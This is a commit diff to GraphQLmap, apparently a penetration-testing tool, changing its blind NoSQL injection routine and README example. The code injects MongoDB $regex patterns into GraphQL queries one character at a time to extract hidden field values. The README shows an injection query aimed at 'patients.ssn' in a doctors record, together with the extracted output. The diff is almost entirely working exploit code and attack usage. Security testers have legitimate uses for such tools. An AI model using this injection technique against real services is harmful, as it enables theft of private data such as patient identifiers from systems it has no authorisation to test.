commit
8beca5922b
|
@ -134,7 +134,9 @@ Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
|
||||||
GraphQLmap > nosqli
|
GraphQLmap > nosqli
|
||||||
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
|
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
|
||||||
Check > 5d089c51dcab2d0032fdd08d
|
Check > 5d089c51dcab2d0032fdd08d
|
||||||
|
Charset > 0123456789abcdef-
|
||||||
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
|
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
|
||||||
|
GraphQLmap >
|
||||||
```
|
```
|
||||||
|
|
||||||
### SQL injection
|
### SQL injection
|
||||||
|
|
22
attacks.py
22
attacks.py
|
@ -159,24 +159,28 @@ def blind_mssql(url, method, headers):
|
||||||
|
|
||||||
|
|
||||||
def blind_nosql(url, method, headers):
|
def blind_nosql(url, method, headers):
|
||||||
# Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
|
# Query - include BLIND_PLACEHOLDER. e.g. {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
|
||||||
# Check : "5d089c51dcab2d0032fdd08d"
|
|
||||||
|
|
||||||
query = input("Query > ")
|
query = input("Query > ")
|
||||||
|
# Check the input (known value) against the data found - e.g. 5d089c51dcab2d0032fdd08d
|
||||||
check = input("Check > ")
|
check = input("Check > ")
|
||||||
|
# Charset to use - Default abcdefghijklmnopqrstuvwxyz1234567890
|
||||||
|
charset = input("Charset > ")
|
||||||
|
if(not charset):
|
||||||
|
charset = "abcdefghijklmnopqrstuvwxyz1234567890"
|
||||||
data = ""
|
data = ""
|
||||||
data_size = 35
|
_break = False
|
||||||
charset = "0123456789abcdef-"
|
|
||||||
|
while (_break == False):
|
||||||
while len(data) != data_size:
|
old_data = data
|
||||||
for c in charset:
|
for c in charset:
|
||||||
injected = query.replace("BLIND_PLACEHOLDER", data + c)
|
injected = query.replace("BLIND_PLACEHOLDER", data + c)
|
||||||
r = requester(url, method, injected, headers)
|
r = requester(url, method, injected, headers)
|
||||||
if check in r.text:
|
if check in r.text:
|
||||||
data += c
|
data += c
|
||||||
|
|
||||||
# display data and update the current line
|
# display data and update the current line
|
||||||
print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False)
|
print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False)
|
||||||
|
# Stop if no character is found
|
||||||
|
if(old_data == data):
|
||||||
|
_break = True
|
||||||
# force a line return to clear the screen after the data trick
|
# force a line return to clear the screen after the data trick
|
||||||
print("")
|
print("")
|
||||||
|
|
Loading…
Reference in New Issue